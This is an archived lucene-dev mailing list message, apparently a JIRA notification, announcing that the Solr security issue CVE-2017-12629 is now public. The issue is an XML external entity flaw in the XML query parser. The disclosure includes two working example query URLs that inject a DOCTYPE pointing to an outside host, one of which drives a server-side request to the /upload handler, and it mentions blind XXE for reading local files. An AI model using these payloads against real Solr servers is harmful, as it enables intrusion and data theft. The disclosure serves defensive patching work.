lucene-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Uwe Schindler (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (SOLR-11477) CVE-2017-12629: Disable external entities in XML query parser
Date Wed, 18 Oct 2017 12:23:00 GMT

     [ https://issues.apache.org/jira/browse/SOLR-11477?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]

Uwe Schindler updated SOLR-11477:
---------------------------------
    Security: Public  (was: Private (Security Issue))

> CVE-2017-12629: Disable external entities in XML query parser
> -------------------------------------------------------------
>
>                 Key: SOLR-11477
>                 URL: https://issues.apache.org/jira/browse/SOLR-11477
>             Project: Solr
>          Issue Type: Task
>      Security Level: Public(Default Security Level. Issues are Public) 
>          Components: query parsers, security
>            Reporter: Christine Poerschke
>            Assignee: Uwe Schindler
>            Priority: Blocker
>             Fix For: 5.5.5, 7.1, 7.2, master (8.0), 6.6.2
>
>         Attachments: SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch,
SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch
>
>
> Lucene includes a query parser that is able to create the full-spectrum of Lucene queries,
using an XML data structure. Starting from version 5.1 Solr supports "xml" query parser in
the search query.
> The problem is that lucene xml parser does not explicitly prohibit doctype declaration
and expansion of external entities. It is possible to include special entities in the xml
document, that point to external files (via file://) or external urls (via http://):
> Example usage: 
> {noformat}
> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM
"http://xxx.s.artsploit.com/xxx"><a></a>'}
> {noformat}
> When Solr is parsing this request, it makes a HTTP request to http://xxx.s.artsploit.com/xxx
and treats its content as DOCTYPE definition. 
> Considering that we can define parser type in the search query, which is very often comes
from untrusted user input, e.g. search fields on websites. It allows to an external attacker
to make arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions.
> For example, this vulnerability could be user to send malicious data to the '/upload'
handler:
> {noformat}
> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM
"http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}
> {noformat}
> This vulnerability can also be exploited as Blind XXE using ftp wrapper in order to read
arbitrary local files from the solrserver.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@lucene.apache.org
For additional commands, e-mail: dev-help@lucene.apache.org


Mime
View raw message